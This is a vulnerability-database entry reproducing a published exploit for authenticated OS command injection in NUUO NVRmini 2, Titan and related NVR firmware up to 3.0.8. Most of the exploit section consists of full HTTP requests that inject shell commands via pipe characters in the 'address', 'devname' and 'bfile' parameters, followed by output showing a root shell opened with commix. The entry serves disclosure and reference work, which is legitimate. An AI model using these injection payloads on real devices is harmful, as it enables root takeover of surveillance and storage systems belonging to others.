ID

VAR-E-201608-0047


EDB ID

40212


TITLE

NUUO NVRmini 2 3.0.8 - Multiple OS Command Injections - PHP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 40212

DESCRIPTION

NUUO NVRmini 2 3.0.8 - Multiple OS Command Injections.. webapps exploit for PHP platform

Trust: 0.6

sources: EXPLOIT-DB: 40212

AFFECTED PRODUCTS

vendor:nuuomodel:nvrminiscope:eqversion:23.0.8

Trust: 1.6

vendor:nuuomodel:osscope:eqversion:3.0.8

Trust: 0.5

sources: PACKETSTORM: 138223 // EXPLOIT-DB: 40212 // EDBNET: 87240

EXPLOIT

NUUO Multiple OS Command Injection Vulnerabilities

Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040, NT-4040(R))
DP: <=04.07.0000.0030, <=04.03.0000.0035
FW: <=02.02.00, <=1.7.0

Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.

NUUO Titan NVR is NUUO's Linux-based open platform recording solution. It is built
on Linux Foundation, with cross-platform Windows and MAC client software. It supports
up to 64 channels of megapixel recording with 250 Mbps throughput. It also comes with
a myriads of features that will sure to fulfill even the most demanding projects. Supports
over 2300 camera models from over 100 vendors.

Desc: NUUO NVRmini, NVRmini2, Crystal, NVRSolo and NVRTitan suffers from multiple
authenticated OS command injection vulnerabilities. This can be exploited to inject
and execute arbitrary shell commands as the root user.

Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
lighttpd/1.4.35
PHP/5.5.3
PHP/5.6.0

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2016-5351
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5351.php

14.01.2016

--

NVRTitan:

POST /handle_iscsi.php HTTP/1.1
Host: 10.0.0.17
Content-Length: x
Origin: http://10.0.0.17
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://10.0.0.17/iscsi.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=c9fdced9e8129eb4c14e3154cd0e0ce3; lang=en; loginName=admin
Connection: close

act=discover&address=1.1.1.1|echo%20pwn&port=3260

HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html; charset=UTF-8
Connection: close
Date: Mon, 18 Apr 2016 08:52:17 GMT
Server: lighttpd/1.4.35
Content-Length: x

pwn

============================================================

NVRmini/2/Solo/Crystal:

GET /cgi-bin/cgi_system?cmd=raid_setup&act=getsmartinfo&devname=|ping%20-n%200%20localhost&rand=1452765315144 HTTP/1.1
Host: 10.0.0.17
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept: */*
Referer: http://10.0.0.17/raid.php
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en
Connection: close

---

POST /cgi-bin/cgi_system?cmd=saveconfig HTTP/1.1
Host: 10.0.0.17
Content-Length: 97
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://10.0.0.17
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://10.0.0.17/save_config.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en
Connection: close

bfolder=%2Fmtd%2Fblock3&bfile=|ping%20-n%200%20localhost&inc_emap=no&inc_pos=no

---

Sample session from commix:

Shell > whoami
root
Shell > ls
Default.ini EMap PatrolOpt003.xml PatrolOpt009.xml PatrolOpt015.xml access apcupsd authority.lic auto_upgrade.ini autoarchive.ini camera.ini cameraparam.ini cmsserver.ini cmsstat daylightsaving.ini ddns.ini dualstreaming.ini email.ini eventaction.ini ezNUUO iobox.ini lenssetting.ini lighttpd-inc.conf lighttpd.conf liveserver.ini notice.ini nuservice.conf pos proftpd-inc.conf pushnotification raid_info.xml recordingmode.ini schedule.ini scheduler_dio.ini scheduler_motion.ini smb-inc.conf version.xml

Trust: 1.0

sources: EXPLOIT-DB: 40212

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 40212

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 40212

TYPE

Multiple OS Command Injections

Trust: 1.0

sources: EXPLOIT-DB: 40212

TAGS

tag:exploit

Trust: 0.5

tag:vulnerability

Trust: 0.5

sources: PACKETSTORM: 138223

CREDITS

LiquidWorm

Trust: 0.6

sources: EXPLOIT-DB: 40212

EXTERNAL IDS

db:ZSLid:ZSL-2016-5351

Trust: 2.7

db:EXPLOIT-DBid:40212

Trust: 1.6

db:EDBNETid:87257

Trust: 0.6

db:EDBNETid:87240

Trust: 0.6

db:PACKETSTORMid:138223

Trust: 0.5

sources: PACKETSTORM: 138223 // EXPLOIT-DB: 40212 // EDBNET: 87257 // EDBNET: 87240

REFERENCES

url:http://www.zeroscience.mk/en/vulnerabilities/zsl-2016-5351.php

Trust: 1.0

url:https://www.intelligentexploit.com

Trust: 0.6

url:https://www.exploit-db.com/exploits/40212/

Trust: 0.6

sources: EXPLOIT-DB: 40212 // EDBNET: 87257 // EDBNET: 87240

SOURCES

db:PACKETSTORMid:138223
db:EXPLOIT-DBid:40212
db:EDBNETid:87257
db:EDBNETid:87240

LAST UPDATE DATE

2022-07-27T10:02:57.936000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:138223date:2016-08-06T19:07:19
db:EXPLOIT-DBid:40212date:2016-08-06T00:00:00
db:EDBNETid:87257date:2016-08-07T00:00:00
db:EDBNETid:87240date:2016-08-07T00:00:00